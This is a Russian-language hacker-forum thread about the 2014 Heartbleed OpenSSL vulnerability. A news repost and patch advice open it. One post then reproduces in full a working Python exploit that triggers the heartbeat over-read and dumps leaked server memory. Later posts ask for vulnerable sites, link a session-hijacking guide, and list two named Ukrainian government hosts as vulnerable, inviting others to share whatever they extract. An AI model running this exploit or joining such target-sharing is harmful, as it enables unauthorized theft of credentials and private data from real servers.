Критическая уязвимость OpenSSL

Discussion in 'Мировые новости. Обсуждения.' started by YaBtr, 8 Apr 2014.

  1. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    В OpenSSL 1.0.1 обнаружена критическая уязвимость CVE-2014-0160

    [​IMG]

    В последнем релизе популярной свободной реализации протоколов SSL/TLS — OpenSSL — обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к конфиденциальной информации.

    Уязвимость CVE-2014-0160, о которой стало официально известно 7 апреля, затрагивает последние релизы OpenSSL: стабильную 1.0.1 и бету 1.0.2-beta, которые, в частности, используются в актуальных версиях дистрибутивов GNU/Linux и других UNIX-подобных систем (например, Ubuntu 12.04 и 13.10, Fedora 18, CentOS 6.5, FreeBSD 8.4). Проблема в обработке памяти в расширении TLS heartbeat приводит к возможности получить данные, хранимые в OpenSSL, что несет серьезную угрозу конфиденциальности информации, передаваемой по зашифрованному каналу.

    Проблему обнаружил Нил Мехта (Neel Mehta) из Google. Исправление уже доступно пользователям OpenSSL 1.0.1 в релизе 1.0.1g, а для бета-версии 1.0.2-beta будет представлено в 1.0.2-beta2. Всем пользователям OpenSSL 1.0.1 рекомендуется срочно обновиться до актуальной версии. Поставщики крупных Linux-дистрибутивов и других систем, использующих OpenSSL, уже выпустили соответствующие обновления.

    8.04.2013 www.nixp.ru/news/В-OpenSSL-1-0-1-обнаружена-критическая-уязвимость-CVE-2014-0160.html

    p.s. www.filippo.io/Heartbleed/ — Проверка вашего сервера на уязвимость
     
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Хостеры уже всех предупредили!
     
    _________________________
  3. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    Знал бы этот криволапый кодер, что натворил заранее можно было бы стать миллионером за пару дней :)
     
  4. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    57
    Reputations:
    81
    пока нашел только такой код, но прав у бага достаточно в потенциале для rce.

    Code:
    #!/usr/bin/python
     
    # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
    # The author disclaims copyright to this source code.
     
    import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse import OptionParser
     
    options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
     
    def h2bin(x):
        return x.replace(' ', '').replace('\n', '').decode('hex')
     
    hello = h2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01                           
    ''')
     
    hb = h2bin('''
    18 03 02 00 03
    01 40 00
    ''')
     
    def hexdump(s):
        for b in xrange(0, len(s), 16):
            lin = [c for c in s[b : b + 16]]
            hxdat = ' '.join('%02X' % ord(c) for c in lin)
            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
            print '  %04x: %-48s %s' % (b, hxdat, pdat)
        print
     
    def recvall(s, length, timeout=5):
        endtime = time.time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time.time()
            if rtime < 0:
                return None
            r, w, e = select.select([s], [], [], 5)
            if s in r:
                data = s.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata
     
     
    def recvmsg(s):
        hdr = recvall(s, 5)
        if hdr is None:
            print 'Unexpected EOF receiving record header - server closed connection'
            return None, None, None
        typ, ver, ln = struct.unpack('>BHH', hdr)
        pay = recvall(s, ln, 10)
        if pay is None:
            print 'Unexpected EOF receiving record payload - server closed connection'
            return None, None, None
        print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
        return typ, ver, pay
     
    def hit_hb(s):
        s.send(hb)
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print 'No heartbeat response received, server likely not vulnerable'
                return False
     
            if typ == 24:
                print 'Received heartbeat response:'
                hexdump(pay)
                if len(pay) > 3:
                    print 'WARNING: server returned more data than it should - server is vulnerable!'
                else:
                    print 'Server processed malformed heartbeat, but did not return any extra data.'
                return True
     
            if typ == 21:
                print 'Received alert:'
                hexdump(pay)
                print 'Server returned error, likely not vulnerable'
                return False
     
    def main():
        opts, args = options.parse_args()
        if len(args) < 1:
            options.print_help()
            return
     
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print 'Connecting...'
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        print 'Sending Client Hello...'
        sys.stdout.flush()
        s.send(hello)
        print 'Waiting for Server Hello...'
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ == None:
                print 'Server closed connection without sending Server Hello.'
                return
            # Look for server hello done message.
            if typ == 22 and ord(pay[0]) == 0x0E:
                break
     
        print 'Sending heartbeat request...'
        sys.stdout.flush()
        s.send(hb)
        hit_hb(s)
     
    if __name__ == '__main__':
        main()
    
     
  5. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    С задержкой новость. За чуть более двух суток сломали пол интернета. В первые часы выхода уязвимость каждый крупный сайт с SSL был уязвим.
     
  6. KoF31n

    KoF31n New Member

    Joined:
    29 Nov 2010
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Если все настолько суриезно, то где утечки?
     
  7. Гуф.

    Гуф. New Member

    Joined:
    25 Feb 2014
    Messages:
    19
    Likes Received:
    3
    Reputations:
    4
    базу VK слили!!!
     
  8. K800

    K800 Nobody's Fool

    Joined:
    25 Dec 2010
    Messages:
    2,191
    Likes Received:
    3,828
    Reputations:
    372
    Видео (язык - английский)
    How to Fix OpenSSL Heart Bleed Bug on Ubuntu

    http://www.youtube.com/watch?feature=player_embedded&v=sq7Eib02Rb8
     
  9. kcash

    kcash New Member

    Joined:
    6 Apr 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    а пример ныне уязвимого сайта можно?
     
  10. chuna

    chuna New Member

    Joined:
    2 Apr 2013
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
  11. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Дамагу еще позавчера слили (=
    http://www.youtube.com/watch?v=UhpqexK2epc
     
    _________________________
  12. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    "Как хрупок мир" (с)
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    жаль что нечё непонятно из того что происходит в начале видео.....
     
  14. Гуф.

    Гуф. New Member

    Joined:
    25 Feb 2014
    Messages:
    19
    Likes Received:
    3
    Reputations:
    4
    а вот это и есть приватный приват, который мы скачаем, когда в интернете уже не останется уязвимых серверов
     
  15. lansia

    lansia New Member

    Joined:
    6 Feb 2011
    Messages:
    111
    Likes Received:
    4
    Reputations:
    5
    Да... есть такое дело....Нашел этот баг на одном сайте. И что можно с этого получить?
    [​IMG][​IMG]
     
  16. KoF31n

    KoF31n New Member

    Joined:
    29 Nov 2010
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    А что ты хочешь получить? Все же описали уже.
    https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/
     
  17. disbeliever

    disbeliever New Member

    Joined:
    22 Jan 2010
    Messages:
    7
    Likes Received:
    2
    Reputations:
    5
    Плагин Chrome для обнаружения уязвимости :D
    http://news.softpedia.com/news/Heartbleed-Install-Chromebleed-on-Chrome-to-Detect-Affected-Sites-436677.shtml
     
  18. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Жесткий случай, от этого никто не застрахован.
     
  19. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    люди подкиньте ещё сайт чтоб убедиться...
     
  20. kcash

    kcash New Member

    Joined:
    6 Apr 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    rm.e-gov.com.ua|VULNERABLE
    mail.e-gov.com.ua|VULNERABLE

    если что-то выдернешь, стукни в ЛС
     
Loading...